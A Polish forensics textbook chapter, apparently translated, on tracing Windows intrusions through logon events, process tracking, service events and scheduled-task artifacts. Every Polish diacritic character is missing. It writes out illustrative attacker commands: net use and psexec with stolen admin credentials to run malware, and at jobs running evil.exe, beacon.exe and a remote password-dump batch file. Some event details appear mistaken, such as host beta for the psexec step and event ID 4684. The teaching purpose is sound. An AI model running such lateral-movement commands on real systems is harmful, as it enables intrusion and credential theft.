Uwaga Czy w Twoim rodowisku uywany jest VNC lub inny program do zdalnego przekazywania obrazu?
Jeli tak, musisz wiedzie, e narzdzia tego typu naladuj lokalne operacje dostpu do systemu.
Przypadki logowania za ich pomoc s najczciej rejestrowane jako zdarzenia typu interaktywnego
lub w celu odblokowania, nie RemoteInteractive.
Analiza aktywnoci hakera w obrbie rodowiska

Kiedy haker wamie si do rodowiska systemw Windows, wykorzystuje skradzione dane
powiadczajce (lokalne lub domenowe) do przechodzenia midzy systemami nazywa si to
ruchem poziomym (ang. lateral movement). W wielu rodowiskach uywane s wsplne hasa
administratora do wszystkich systemw lub grup systemw (np. wszystkich stacji roboczych
z okrelonego regionu). Jeeli haker zamie zabezpieczenia jednego z tych systemw i zdobdzie
jego dane powiadczajce, moe bez przeszkd penetrowa rne hosty. Co gorsza, jeli hakerowi
uda si zdoby dostp do konta administratora domeny lub innego o takich samych uprawnieniach,
moe wej do kadego systemu w domenie.
Jedn z trudnoci, jakie napotyka si przy analizowaniu tego rodzaju aktywnoci jest to, e jej
lady mog si miesza ze ladami normalnej aktywnoci legalnych uytkownikw. Problem ten
jest szczeglnie dotkliwy w rodowiskach, w ktrych konta usug aplikacji i uprzywilejowane konta
domenowe mog inicjowa sieciowe i interaktywne sesje logowania typowe dla ludzi. Pewnie
nie raz bdziesz szuka dowodw logowa hakerw przy uyciu takich danych powiadczajcych
wrd ladw legalnej codziennej aktywnoci.
Teraz wykorzystamy uzyskane wiadomoci o typach logowania do przedstawienia typowych
metod ruchu poziomego oraz omwimy, jakie dowody mona przy ich uyciu zdoby.
Nasz haker, Bob, ma interaktywny dostp do stacji roboczej z systemem operacyjnym
Windows 7 o nazwie alpha.
Stacja alpha jest poczona z korporacyjn domen ACME.
Backdoor dziaa w kontekcie uytkownika domeny bdcego posiadaczem stacji alpha
o nazwie ACME/Eve.
Wykonujc zrzut hase i stosujc inne niecne metody, haker zdoby dane powiadczajce
do dwch kont:
lokalnego administratora o nazwie localAdmin, ktry ma identyczne haso na kadej
stacji roboczej w domenie ACME,
administratora domeny, ACME\domainAdmin, ktry ma peny dostp do wszystkich
stacji roboczych i serwerw w rodowisku.
Bob wykorzystuje swj backdoor do wykonywania polece powoki w kontekcie uytkownika
ACME\Eve. Ponadto za pomoc rnych polece w poczeniu z danymi powiadczajcymi kont
localAdmin i ACME\domainAdmin uzyskuje dostp do czterech systemw, w kadym przypadku
w inny sposb.
1. Za pomoc poniszego polecenia Bob montuje udzia C$ dla stacji roboczej beta z systemu
rdowego alpha w celu przesania szkodliwego oprogramowania i narzdzi:
net use \\beta\c$ /u:localAdmin "badPassword"
2. Przy uyciu narzdzia SysInternals PsExec haker zdalnie wykonuje polecenie na stacji
roboczej gamma, ponownie z systemu alpha:
psexec.exe \\gamma -u ACME\domainAdmin -p worsePassword "C:\path\to\malware.exe"
3. Nastpnie Bob za pomoc wbudowanego w system Windows klienta RDP wykonuje

podczenie zdalnego pulpitu do serwera zeta (nazwa uytkownika: ACME\domainAdmin,
haso: worsePassword) po raz kolejny ze stacji alpha.
4. Bob przechodzi do intranetowego serwera sieciowego IIS o nazwie delta, ktry wymaga
uwierzytelniania NTLM. Bob uywa danych powiadczajcych uytkownika
ACME\domainAdmin.
Kada z tych czynnoci powoduje zdarzenie logowania, tylko jakiego typu i gdzie ich szuka?
Czynno 1. spowoduje wygenerowanie zdarzenia logowania typu 3. (sieciowe)
na komputerze beta, poniewa zostao uyte konto lokalne.
Czynno 2. spowoduje wygenerowanie zdarzenia logowania typu 3. na komputerze beta
i w kontrolerze domeny ACME, poniewa zostao uyte konto domeny. Ponadto na
komputerze alpha zostanie zarejestrowane zdarzenie Prba logowania przy uyciu jawnych
powiadcze (identyfikator 4684), w ktrym znajd si informacje dotyczce uycia przez
hakera danych powiadczajcych do konta ACME\domainAdmin oraz docelowego systemu
beta. Zdarzenie to zostanie wygenerowane z powodu uycia narzdzia PsExec z innymi
danymi powiadczajcymi domeny ni bieca sesja hakera (ACME\Eve).
Czynno 3. spowoduje wygenerowanie zdarzenia logowania typu 10. (RemoteInteractive)
na komputerze zeta oraz w kontrolerze domeny ACME.
Czynno 4. spowoduje wygenerowanie zdarzenia logowania typu 3. (z powodu
uwierzytelniania IIS) na komputerze delta i w kontrolerze domeny ACME.
Przytoczone przykady ilustruj wpyw, jaki maj rne mechanizmy logowania oraz rodzaj
uytego konta na typy generowanych zdarze i systemy, w ktrych mona pniej szuka materiau
dowodowego. W duych rodowiskach moe mie to powane konsekwencje dla ledztwa zwaszcza
w przypadkach, w ktrych haker intensywnie korzysta z kont lokalnych poniewa analiza ruchu
poziomego hakera moe wymaga zbadania dziennikw z wszystkich systemw.
Uwaga Zdarzenia uwierzytelniania Kerberos dla ruchu poziomego zazwyczaj nie zawieraj informacji
o systemie rdowym ani adresu IP. Z drugiej strony logowania sieciowe przy uyciu Kerberosa
czsto s bezporednio poprzedzone logowaniem z konta systemu rdowego. Poszukaj wic
zdarze tego typu, jeli chcesz wykry rdo prb uwierzytelnienia Kerberos.
W dzienniku zdarze moe by trudno odrni legaln aktywno od podejrzanej, zwaszcza

na pocztkowych etapach ledztwa, gdy dostpna jest niewielka liczba tropw. Analizujc dzienniki
z pewnego okresu i szukajc interesujcych zdarze, przejrzyj ca histori dziennika, aby
dowiedzie si, jak czste lub nieczste s te zdarzenia. Przykadowo zdarzenie usugi majce
miejsce w czasie aktywnoci hakera moe w ogle czsto wystpowa atwo to przeoczy, gdy
ca uwag powica si tylko jednemu okresowi. Ponadto dobrym pomysem moe by zebranie
i przeszukanie zdarze logowania w celu dowiedzenia si, ktre systemy rdowe i konta s
czsto uywane w ramach normalnej dziaalnoci. W ten sposb mona uatwi sobie odrnienie
nietypowych prb logowania od legalnych.
Badanie zmian kont i ustawie zabezpiecze

Niektre typy zdarze rejestrowanych w dzienniku zabezpiecze zawieraj informacje o zmianach
kont uytkownikw i zasad zabezpiecze. Przegld tych zapisw moe pomc w ustaleniu, czy haker
szpera w systemowych ustawieniach zabezpiecze.
Zdarzenia dotyczce zarzdzania kontem pozwalaj zorientowa si, czy zostao utworzone, usunite,
wczone lub wyczone konto uytkownika, oraz wykry podobne zmiany w grupach kont.
Zdarzenia zmiany zasad dostarczaj informacji o zmianach systemowych ustawie
zabezpiecze, wcznie z zasadami inspekcji, ktre okrelaj, co ma by rejestrowane
w dziennikach zdarze.
Zdarzenie zawierajce informacj Dziennik inspekcji zosta wyczyszczony jest rejestrowane,
gdy uytkownik skasuje dzienniki zdarze bez wzgldu na ustawienia inspekcji.
W powiadomieniu zawarta jest nazwa uytkownika, ktry wprowadzi zmian.
ledzenie procesw
Funkcja ledzenia procesw, zwana te ledzeniem szczegowym lub inspekcj procesw, generuje
zdarzenie w dzienniku zdarze zabezpiecze dla kadego przypadku uruchomienia i zakoczenia procesu.
Zdarzenia te zawieraj pen ciek do pliku wykonywalnego na dysku, identyfikator procesu, identyfikator
procesu nadrzdnego oraz identyfikator logowania, przy uyciu ktrego proces by wykonywany. Dane te
pozwalaj dowiedzie si, co uytkownik uruchamia w okrelonym okresie. Domylnie ustawienie to
jest wyczone, ale mona je wczy w lokalnej zasadzie inspekcji lub poprzez Obiekty zasad grupy.
Czasami chcemy, aby funkcja ledzenia procesw rejestrowaa troch wicej danych.
Do najwaniejszych brakw zaliczaj si argumenty procesu i nazwa procesu nadrzdnego.
Informacje te w niektrych przypadkach s po prostu bezcenne, zwaszcza gdy haker wykorzystuje
narzdzia wiersza polece. Jeeli np. haker skompresowa wykradzione dane za pomoc narzdzia
wiersza polece, poznalibymy katalogi rdowy i docelowy, a moe nawet haso do archiwum.
Na rysunku 12.10 pokazano przykad zdarzenia utworzenia procesu, w ramach ktrego konto
ukasz-Komputer\ukasz uruchomio plik C:\Windows\system32\mmc.exe.
RYSUNEK 12.10. Zdarzenie inspekcji procesu utworzenie procesu (identyfikator zdarzenia 4688)
Ostrzeenie Funkcja ledzenia procesw powoduje wygenerowanie i zapisanie w dzienniku duej iloci zdarze.
Jeli zdecydujesz si na jej wczenie, zwiksz maksymaln wielko dziennika zabezpiecze,
aby zapobiec zbyt szybkiemu zapenieniu i zbyt czstemu rotowaniu. W niektrych przypadkach
ledzenie procesw znacznie pogarsza wydajno systemu. Jeli wic planujesz je zastosowa
w wanych systemach, koniecznie najpierw przeprowad dokadne testy.
Analiza zdarze usug

Usugi systemu Windows s czsto wykorzystywane do zapisywania danych przez szkodliwe
programy. Ponadto niektre nietrwae wirusy mog instalowa si jako tymczasowe usugi,
aby dziaa ze zwikszonymi uprawnieniami. Na szczcie kade uruchomienie i zatrzymanie
usugi powoduje utworzenie wpisu w dzienniku systemowym przez Menedera kontroli usugi.
Gdy usuga zostaje uruchomiona jawnie (np. po instalacji), Meneder kontroli usugi rejestruje
zdarzenie z informacj, e usuga zostaa pomylnie uruchomiona. Zdarzenie to zazwyczaj zawiera
nazw konta uytkownika, ktre zainicjowao usug. Gdy usuga zacznie dziaa, Meneder
kontroli usugi zapisuje w dzienniku informacj, e usuga zostaa uruchomiona. Podobne
komunikaty s zapisywane w dzienniku dla zdarze zatrzymania usug. Przykadowo narzdzie
SysInternals PsExec instaluje si jako usuga Windows na zdalnym systemie odbierajcym
poczenie. Gdy koczy si sesja PsExec, usuga zostaje zamknita i nastpnie odinstalowana.
W poniszej tabeli przedstawiono sekwencj zdarze, jaka zostaaby zarejestrowana w dzienniku
systemowym.
Data Identyfikator zdarzenia Opis zdarzenia Uytkownik

10/20/2013 7035 Usuga PsExec otrzymaa CORPDOMAIN\Jane
polecenie uruchomienia si
21:12:59 7036 Usuga PsExec zostaa N/A
uruchomiona
10/20/2013 7035 Usuga PsExec otrzymaa CORPDOMAIN\Jane
polecenie zatrzymania si
21:12:59 7036 Usuga PsExec zostaa N/A
zatrzymana
Uwaga Podczas ledztw czsto wykorzystujemy nazw uytkownika zarejestrowan ze zdarzeniami

o identyfikatorze 7035 jako wan informacj lub wskanik, e doszo do zagroenia.
Przykadowo w jednej ze spraw udao nam si odrni legalne przypadki uycia narzdzia
PsExec od nielegalnych przypadkw jego wykorzystania dziki dowiedzeniu si, ktre konto
uytkownika uruchomio usug. Informacj t znalelimy w zdarzeniach zapisanych
w dzienniku systemowym.
W przecitnym systemie Windows s setki usug. Wiele z nich zmienia si, uruchamia
i zatrzymuje podczas normalnego dziaania systemu. Wiemy z dowiadczenia, e bardzo trudno
znale podejrzane usugi, przegldajc tylko zdarzenia w dzienniku. Jeli jednak znany jest
okres aktywnoci hakera, wystpujcy np. w pobliu serii zdarze logowania, moe si okaza,
e zdarze do przeanalizowania jest znacznie mniej. Przede wszystkim naley dokadnie zbada
wszystkie nowe usugi uruchamiane po raz pierwszy w takich okresach.
Uwaga Jeli wczona bdzie funkcja ledzenia procesw, w dzienniku zdarze zabezpiecze bd
rejestrowane wszystkie przypadki utworzenia nowych usug przez Meneder kontroli usugi
(identyfikator 601 lub 4697).
Ponadto systemowy dziennik zdarze mona przeszuka pod ktem wystpowania w nim znanych
nazw zych usug, ktre zostay zidentyfikowane podczas analizy innych systemw. Czasami moe
te si zdarzy tak, e haker albo program antywirusowy usunie plik binarny szkodliwej usugi po jej
zainstalowaniu, ale nie usunie odpowiadajcych jej kluczy konfiguracyjnych z rejestru. Wwczas
Meneder kontroli usugi bdzie rejestrowa zdarzenia niepowodzenia za kadym razem, gdy sprbuje
zaadowa t usug.
Wracajc do wczeniejszego przykadu, gdyby program PsExec zosta uyty w sposb niedozwolony
w naszym rodowisku, zdarzenie tej usugi mona by wykorzysta jako wskanik zagroenia podczas
analizy innych systemw lub przeszukiwania zgromadzonych danych z dziennikw. Ta sama zasada
dotyczy kadej nazwy usugi wykorzystywanej do zapisania szkodliwego oprogramowania przez
hakera jeli jest niepowtarzalna, mona jej uy jako wskanik przy przegldaniu dziennikw
zdarze. Przykadowo niektre wersje popularnego narzdzia do wykonywania zrzutw hase
i odtwarzania skrtw Windows Credential Editor tworz usug o nazwie WCE Service, ktr
mona wykorzysta jako bardzo skuteczny wskanik.
Inne porady na temat analizowania dziennikw

Oto kilka dodatkowych wskazwek dotyczcych analizowania dziennikw.
Jeeli tropisz podejrzan, ale jeszcze niezaklasyfikowan nigdzie aktywno w systemie,
sprawd w dzienniku zdarze aplikacji, czy w interesujcym Ci okresie zostay
wygenerowane jakiekolwiek powiadomienia programu antywirusowego. W ten sposb
moesz znale wskazwki, gdzie szuka podejrzanych plikw albo nawet dowiedzie si,
czy pocztkowe tropy dotyczyy czsto spotykanych oglnych infekcji, czy czego,
co wymaga dokadniejszego zbadania.
W podrozdziale tym opisalimy, jak cenne dla ledczego mog by informacje zawarte
w dziennikach zdarze. Jeli jednak dzienniki s tak mae, e podlegaj czstej rotacji,
moe si okaza, e zawieraj niepene dane do analizy. Przestrze dyskowa jest tania
wikszo uytkownikw nawet nie zauway, e ubyo im 500 MB czy 1 GB miejsca
wic warto rozway moliwo zwikszenia dziennikw, aby mogy przechowywa
wiksz ilo informacji.
Jeli pobierzesz dzienniki zdarze z systemu Windows XP lub Server 2003, przegldarka
zdarze lub inne narzdzie analityczne moe informowa Ci, e pliki EVT s uszkodzone.
Jest to powszechnie znany problem, ktry mona atwo naprawi za pomoc darmowego
narzdzia FixEVT dostpnego na poniszej stronie internetowej.
W INTERNECIE
murphey.org/fixevt.html
Narzdzia do analizy dziennikw zdarze

Narzdzia do analizy dziennikw zdarze umoliwiaj pobieranie, przegldanie, przeszukiwanie,
sortowanie oraz filtrowanie plikw EVT i EVTX, ktrych tre bez obrbki jest nieczytelna.
W poniszej tabeli przedstawiamy kilka naszych ulubionych programw z tej kategorii.
Nazwa
Moliwoci Licencja Adres
narzdzia
Podgld Otwieranie dziennikw zdarze Darmowa Narzdzie wbudowane
zdarze oraz ich przeszukiwanie, sortowanie w system Windows
i filtrowanie za pomoc sw
kluczowych i wyrae XPath
PSLogList Zrzucanie dziennikw do formatu Darmowa technet.microsoft.com/
tekstowego z lokalnego lub zdalnego en-us/sysinternals/
systemu bb897544.aspx
Log Parser Wysyanie zapyta SQL do lokalnych Darmowa www.microsoft.com/
dziennikw zdarze en-us/download/
details.aspx?id=24659
Event Log adowanie, konsolidowanie, filtrowanie Patna www.eventlogxp.com
Explorer oraz przeszukiwanie dziennikw
zdarze. Program odznaczajcy si
wysok wydajnoci obrbki duych
plikw
LfLe Heurystyczne odzyskiwanie zdarze Darmowa github.com/
z obrazw dyskw williballenthin/LfLe
Python-Evtx Parser w jzyku Python dziennikw Darmowa www.williballenthin.com/
w formacie EVTX evtx/index.html
Plaso Mechanizm przetwarzania dowodw Darmowa code.google.com/p/plaso
z moliwoci tworzenia osi czasu
obsuguje formaty EVT i EVTX
Niektre z tych narzdzi, np. PSLogList, pobieraj i przetwarzaj dzienniki zdarze tylko
z dziaajcych systemw. Inne natomiast, np. Podgld zdarze, wczytuj te surowe dzienniki
skopiowane na potrzeby ledztwa.
Warto zauway, e program Podgld zdarze firmy Microsoft zosta znacznie ulepszony
w systemie Windows Vista i nastpnych. Wprawdzie nadal ma spore problemy z wywietlaniem
i przeszukiwaniem duych dziennikw, ale ma te doskonae funkcje wyszukiwania i filtrowania
zwaszcza w porwnaniu ze starszymi wersjami.
Uwaga Czas na mae zamieszanie! Wpisy w dziennikach zdarze s rejestrowane w czasie UTC. Jednak rne
narzdzia do analizy dziennikw konwertuj te znaczniki czasu na rne sposoby, co moe by
kopotliwe dla kogo, kto prbuje uzgodni czasy z rnych rde. Przykadowo Podgld zdarze
systemu Windows wywietla zdarzenia w czasie systemowym niezalenie od tego, co jest
w oryginalnym rdle dziennika. Aby unikn nieporozumie i bdw, zawsze dokadnie sprawdzaj,
jak uywane przez Ciebie narzdzia obsuguj znaczniki czasu, oraz ustaw stref czasow swojego
systemu uywanego do wykonywania ekspertyz na UTC. Tak bdzie o wiele atwiej.
ZADANIA ZAPLANOWANE
Harmonogram zada systemu Windows umoliwia automatyczne uruchamianie programw
okrelonego dnia i o wybranej godzinie lub regularnie. Peni rol podobn do narzdzia cron
wbudowanego w wikszo systemw uniksowych. Aplikacje mog programowo tworzy zadania
zaplanowane za porednictwem interfejsu API systemu Windows. Wiele programw korzysta z tej
moliwoci np. w celu okresowego sprawdzania dostpnoci aktualizacji. Uytkownicy te mog
tworzy zadania zaplanowane za pomoc polece konsoli at i schtasks. Od wersji Vista systemu
Windows dostpna jest ulepszona implementacja harmonogramu zada z konsol zarzdzania
do tworzenia, edytowania i usuwania zada.
Hakerzy czsto wykorzystuj zaplanowane zadania do zdalnego uruchamiania szkodliwych
programw w zdobytych systemach bez uycia pomocniczych narzdzi typu PsExec, ktre
zwikszaj ryzyko wpadki. Technika ta jest szczeglnie czsto stosowana, gdy haker ma dostp
tylko do konsoli.
Tworzenie zada za pomoc polecenia at

Najprostszym sposobem na utworzenie zadania zaplanowanego jest uycie polecenia at.
Przyjrzymy si kilku prostym przykadom ilustrujcym sposb jego zastosowania. Pamitaj,
e polecenie to mog wykonywa tylko uytkownicy posiadajcy przynajmniej uprawnienia
lokalnego administratora na hocie lokalnym (dotyczy zada tworzonych lokalnie) lub
docelowym (dotyczy zada tworzonych zdalnie).
at 16:25 "C:\WINDOWS\evil.exe"
Uruchom program evil.exe jeden raz o najbliszej godzinie 6:25.
at 10:25 "C:\temp\beacon.exe" /every:m,t,w
Uruchamiaj program beacon.exe o godzinie 10:25 w poniedziaki, wtorki i rody.
at \\alpha 08:00 "C:\RECYCLER\passdump.bat"
Uruchom plik C:\RECYCLER\passdump.bat na komputerze alpha o najbliszej godzinie
08:00 czasu lokalnego tego systemu.
Widzisz co ciekawego w ostatnim przykadzie? Przedstawione w nim polecenie tworzy zadanie
w zdalnym systemie (alpha), a nie lokalnie tak, mona to zrobi. Jedynym warunkiem jest
umieszczenie pliku C:\RECYCLER\passdump.bat w systemie alpha, a nie rdowym. Ponadto
do zdalnego utworzenia zadania zaplanowanego potrzebne s uprawnienia administratora na
zdalnym systemie. Jeeli nie dokona si wczeniej uwierzytelnienia, polecenie at zwrci bd
odmowy dostpu.
Pewnie si zastanawiasz, jaka strefa czasowa jest uywana w tych przykadach. Jest to czas
lokalny systemu, na ktrym zostao zaplanowane zadanie. Czasami mona nawet nie wiedzie,
w jakiej strefie czasowej znajduje si system zwaszcza podczas pracy ze zdalnymi systemami
nalecymi do globalnej infrastruktury. Hakerzy czsto przed zaplanowaniem zadania zdalnego
wykonuj polecenie net time \\hostDocelowy, aby sprawdzi, jaki jest czas lokalny w danym
systemie. Jest to bardzo dobry sposb na odpowiednie planowanie zada nie trzeba sprawdza
ani zna strefy czasowej adnego systemu.
Gdy utworzy si kilka zaplanowanych zada, mona wywietli ich list w systemie lokalnym
lub zdalnym za pomoc polecenia at bez adnych parametrw (np. at albo at \\systemDocelowy).
Uwaga Zadania zaplanowane za pomoc polecenia at lokalne i zdalne dziaaj pod kontrol
wbudowanego konta SYSTEM. Hakerzy czsto to wykorzystuj do wykonywania szkodliwych
programw, np. niektrych aplikacji do zrzucania hase, ktre mog wymaga wikszych
uprawnie ni normalny administrator ma w systemie Windows Vista i nowszych.
Naley te wiedzie, e do kadego zadania zaplanowanego za pomoc polecenia at

przydzielany jest identyfikator numeracja zaczyna si od 1 dla pierwszego aktywnego zadania
i jest sukcesywnie zwikszana dla kolejnych. Szczegowe informacje o wybranym zadaniu mona
wywietli za pomoc polecenia:
at #
Znak # naley zastpi identyfikatorem interesujcego nas zadania. Zadanie mona te usun
za pomoc polecenia:
at # /delete
Uwaga A co z nazwami? Zadania zaplanowane tworzone za pomoc narzdzia at nie maj nazw, ale
mona si do nich odnosi przy uyciu identyfikatorw (At1, At2 itd.). Dla porwnania, zadania
tworzone za pomoc interfejsu API systemu Windows lub polecenia schtasks mog mie nazwy.
Oczywicie nie wszystkie zadania bez nazwy s szkodliwe administratorzy systemw czsto
uywaj polecenia at do rnych celw automatyzacyjnych i serwisowych.
Wicej informacji na temat skadni polecenia at mona znale w portalu TechNet firmy
Microsoft.
W INTERNECIE
technet.microsoft.com/en-us/library/bb490866.aspx
Tworzenie zada za pomoc polecenia schtasks

Polecenie schtasks to nieco solidniejsze narzdzie wiersza polece do zarzdzania zadaniami
zaplanowanymi, ktre firma Microsoft dodaa do systemw Windows XP Professional, Windows
Server 2003 i wszystkich nastpnych wersji swojego systemu operacyjnego. Za jego pomoc mona
tworzy zadania z nazwami, ustawia konto, pod ktrego kontrol maj one by wykonywane,
wcza skomplikowane harmonogramy oraz robi wiele innych rzeczy.
Hakerzy rzadziej korzystaj z polecenia schtasks ni z at, poniewa jest bardziej skomplikowane,
a wikszo jego zalet jest przydatna tylko dla legalnych uytkownikw. Wicej informacji na temat
tego polecenia mona znale w portalu TechNet.
W INTERNECIE
technet.microsoft.com/en-us/library/bb490996.aspx
Ostrzeenie Jest jedna wana rnica dzielca polecenia schtasks i at, o ktrej naley wiedzie. Jeli polecenie
schtasks zostanie wykonane bez parametrw, wywietli wszystkie zadania zaplanowane zarwno
przez polecenie schtasks, jak i at. Natomiast polecenie at bez parametrw wywietli tylko
zadania utworzone przez polecenie at.
Dowody
lady niedawno zaplanowanych zada oraz zapis wczeniej wykonanych zada mona pobra
i z dziaajcego systemu Windows, i z obrazu napdu z tym systemem. Poniej opisujemy,
jakie pliki i dzienniki bd potrzebne.
Pliki .job
Dane konfiguracyjne zada zaplanowanych s przechowywane w plikach .job po jednym na
zadanie w katalogu %SYSTEMROOT%\Tasks. Pliki te s zakodowane w firmowym formacie,
ktrego dokumentacj mona znale w portalu TechNet.
W INTERNECIE
msdn.microsoft.com/en-us/library/cc248285(v=prot.13).aspx
W starszych wersjach systemu Windows (starszych od Visty) Harmonogram zada usuwa

pliki .job dotyczce wykonanych zada, czym znacznie utrudnia wykrywanie ladw wczeniej
wykonywanych zada. W systemie Windows Vista pliki .job zaczto przechowywa do czasu
zatrzymania lub ponownego uruchomienia Harmonogramu zada, ktre najczciej ma miejsce
po zamkniciu i ponownym uruchomieniu komputera.
Dzienniki usugi Harmonogram zada

Usuga Harmonogram zada systemu Windows rejestruje czas rozpoczcia i zakoczenia
wykonywanych zada w pliku tekstowym o nazwie SchedLgU.txt. Maksymalny rozmiar tego pliku
to 32 kB; po jego osigniciu nastpuje rotacja zawartoci.
%SYSTEMROOT%\SchedLgU.txt Windows 2000, Server 2003 i XP
%SYSTEMROOT%\Tasks\SchedLgU.txt Windows Vista, 2008 i nowsze
W systemach Windows Vista, 7 i Server 2008 dodano kilku specjalnych dziennikw zdarze.
Jest wrd nich take dziennik do rejestrowania aktywnoci Harmonogramu zada
Microsoft-Windows-TaskScheduler%4Operational.evtx. Dziennik ten zawiera znacznie wicej
informacji ni SchedLgU.txt, np. pen ciek do procesw wykonywanych przez zadanie
zaplanowane oraz nazw konta uytkownika, za pomoc ktrego zarejestrowano lub utworzono
zadanie. Szczegowy opis tego dziennika znajduje si nieco dalej.
Uwaga Dziennik Harmonogramu zada mona atwo wczy za pomoc narzdzia

wevtutil: wevtutil sl Microsoft-Windows-TaskScheduler/Operational /e:True.
Na koniec nie zapomnij pobra systemowego dziennika zdarze zabezpiecze (Security.evt

lub Security.evtx). Plik ten moe by rdem cennych informacji na temat zada zaplanowanych,
jeli wczona bya funkcja ledzenia procesw.
Analiza
Wiedzc, jak pobra z systemu wszystkie artefakty dotyczce zada zaplanowanych, moemy
skoncentrowa si na sposobach przetwarzania i interpretowania ich zawartoci. W tym punkcie
opisujemy metody analizowania plikw .job i wpisw, jakie mona znale w obu rodzajach
dziennikw zada zaplanowanych.
Analizowanie plikw .job

Jak napisalimy wczeniej, najprawdopodobniej zdobdziesz pliki .job zada zaplanowanych
do wykonania w przyszoci lub do wykonywania cyklicznie. Powiedzmy wic, e interesuje nas
pewne zadanie. Jak przeanalizowa odpowiadajcy mu plik .job?
Zawarto pliku .job zawsze mona wywietli za pomoc edytora szesnastkowego lub polecenia
strings (rysunek 12.11). Najwaniejsze informacje, takie jak nazwa uytkownika i pena cieka
do programu uruchamianego przez zadanie, s czytelne i od razu rzucaj si w oczy.
RYSUNEK 12.11. Surowa tre pliku .job w edytorze szesnastkowym
Zalecamy jednak skorzystanie ze specjalnego narzdzia do analizy plikw .job, ktre potrafi
zrekonstruowa zawarte w nich dane konfiguracyjne. Doskonale do tego celu nadaje si skrypt
jobparser.py Jamiego Levyego. Program ten obsuguje pliki .job ze wszystkich najwaniejszych
wersji systemu Windows (rysunek 12.12).
W INTERNECIE
gleeda.blogspot.com/2012/09/job-file-parser.html
RYSUNEK 12.12. Tre pliku .job przeanalizowana za pomoc skryptu jobparser.py
Uwaga Potrzebujesz innych dowodw na to, e zadanie zaplanowane zostao wykonane w interesujcym
Ci systemie? Czas ostatniej modyfikacji katalogu %SYSTEMROOT%\Tasks czsto jest zbieny z czasem
utworzenia ostatniego zadania lub ukoczenia zadania (wie si to z dodaniem lub usuniciem
pliku .job). Ponadto klucze rejestru Harmonogramu zada take mogy zosta zmodyfikowane
podczas ostatniego wykonywania zadania.
Analizowanie pliku SchedLgU.txt

Dziennik SchedLgU.txt moe by przydatnym rdem informacji o wczeniej wykonywanych
zadaniach, a w systemach Windows 2000, XP oraz Server 2003 jest w ogle jedynym dostpnym
rdem tego typu danych. Na szczcie plik ten jest atwy do analizy i nie potrzeba do tego
adnych specjalistycznych narzdzi (cho trzeba pamita, e jego zawarto ma kodowanie
Unicode). Na rysunku 12.13 przedstawiono fragment zawartoci dziennika SchedLgU.txt
z systemu Windows XP.
RYSUNEK 12.13. Fragment przykadowego dziennika Harmonogramu zada SchedLgU.txt

Na podstawie widocznych informacji moemy wycign nastpujce wnioski na temat dwch zada.
Nienazwane zadanie zaplanowane, At2.job, wykonao plik a.bat 25 wrzenia 2009 roku
o godzinie 2:26:00 i dziaao do godziny 2:34:13.
Na podstawie naszej znajomoci konwencji nazywania zada wnioskujemy, e w chwili
tworzenia zadania At2.job musiao istnie jeszcze jedno zadanie, At1.job.
Nazwane zadanie zaplanowane, SCOM 2007 Agent Resume Task.job, wykonao plik sc.exe
14 wrzenia 2010 roku o godzinie 14:55:00 i zakoczyo si w tej samej sekundzie.
Oba zadania zostay wykonane bez bdw, o czym wiadczy kod zakoczenia 0.
Czego brakuje? Niestety brakuje wielu wanych szczegw. Plik SchedLgU.txt nie rejestruje
nazwy konta uytkownika uytego do utworzenia zadania zaplanowanego. Zapisywana jest w nim
tylko nazwa pliku wykonanego przez zadanie (np. a.bat) brak jakichkolwiek informacji o ciece
i argumentach. Nie mamy te moliwoci sprawdzi, czy drugie zadanie wykonao legalny program
sc.exe z katalogu %SYSTEMROOT%\system32, czy moe jaki inny program z innego miejsca.
Uwaga Warto wiedzie, e zadania zaplanowane mog te porednio wykonywa inne programy za pomoc
interpretera polece. Przykadowo nastpujce zadanie uruchomioby program cscript.exe poprzez
cmd.exe, ktry z kolei zinterpretowaby skrypt VBS: at 12:34 \\beta "cmd.exe /c
cscript.exe c:\temp\foo.vbs". W tym przypadku w dzienniku SchedLgU.txt znalazaby si
tylko informacja, e zadanie wykonao plik cmd.exe.
I jeszcze jedno dziwactwo dziennika SchedLgU.txt, o ktrym naley pamita: zdarzenia

w nim nie s rejestrowane w czasie UTC, tylko w lokalnym czasie systemowym. Jeli wic chcesz
zachowa spjno swoich dowodw, moesz by zmuszony do wykonania konwersji stref
czasowych (z uwzgldnieniem zmian czasu letniego na zimowy i odwrotnie). Ponadto moe
zauwaye, e mimo i zawarto dziennika jest posortowana chronologicznie, od najstarszego
do najnowszego zadania, czasami w rodku pliku znajduje si punkt rotacji. Jako e plik ten
nie jest duy, zawsze powinno si go szybko przejrze od pocztku do koca, aby sprawdzi,
czy na pewno zawiera informacje o zdarzeniach z takiego okresu, z jakiego nam si wydaje.
Mimo tych ogranicze dziennik SchedLgU.txt jest bardzo przydatnym rdem dowodw,
ktre dziki niewielkiemu rozmiarowi i prostemu formatowi nadaje si do wielkoskalowej analizy.
Czsto pobieramy ten plik ze wszystkich systemw w przedsibiorstwie, w ktrym prowadzimy
ledztwo, aby aktywnie szuka wskanikw zagroenia. Nienazwane zadania zaplanowane, zadania
uruchamiajce skrypty wsadowe o dziwnych nazwach oraz zadania uruchamiajce interpreter
cmd.exe s zazwyczaj czym niezwykym w zarzdzanych sieciach korporacyjnych. Identyfikacja
takich zada moe dostarczy przydatnych tropw do dalszej analizy.
Analizowanie zada zaplanowanych w dziennikach zdarze

Dziennik operacyjny Harmonogramu zada systemu Windows Microsoft-Windows-TaskScheduler/
Operational.evtx zawiera bardziej szczegowe informacje ni plik SchedLgU.txt i dobrze go uzupenia
jako rdo dowodw. W poniszej tabeli przedstawiamy, jak w dzienniku tym wyglda zapis dotyczcy
utworzenia i wykonania prostego zadania w systemie Windows 2008 Server o nazwie DCSERVER2008.
Data i godzina Identyfikator

Numer Informacja o zdarzeniu
(UTC) zdarzenia
1 03/01/2012 Uytkownik CORPDOMAIN\superuser 106
10:03:40 zarejestrowa zadanie Harmonogramu zada \At1
2 03/01/2012 Uytkownik CORPDOMAIN\superuser 140

10:03:40 zaktualizowa zadanie Harmonogramu zada \At1
3 03/01/2012 Harmonogram zada uruchomi wystpienie 107

10:05:00 {3843A931-B021-98DC-2F3F-940C4EB09011}
zadania \At1 z powodu stanu wyzwalacza
czasowego.
4 03/01/2012 Aparat zada S-1-5-18:NT AUTHORITY\ 319
10:05:00 System:Service: otrzyma od usugi
Harmonogram zada komunikat z daniem
uruchomienia zadania \At1
5 03/01/2012 Harmonogram zada uruchomi wystpienie 100
10:05:00 {3843A931-B021-98DC-2F3F-940C4EB09011}
zadania \At1 dla uytkownika
CORPLOCAL\DCSERVER2008$
6 03/01/2012 Harmonogram zada uruchomi akcj 200
10:05:00 c:\windows\system32\drop.bat w wystpieniu
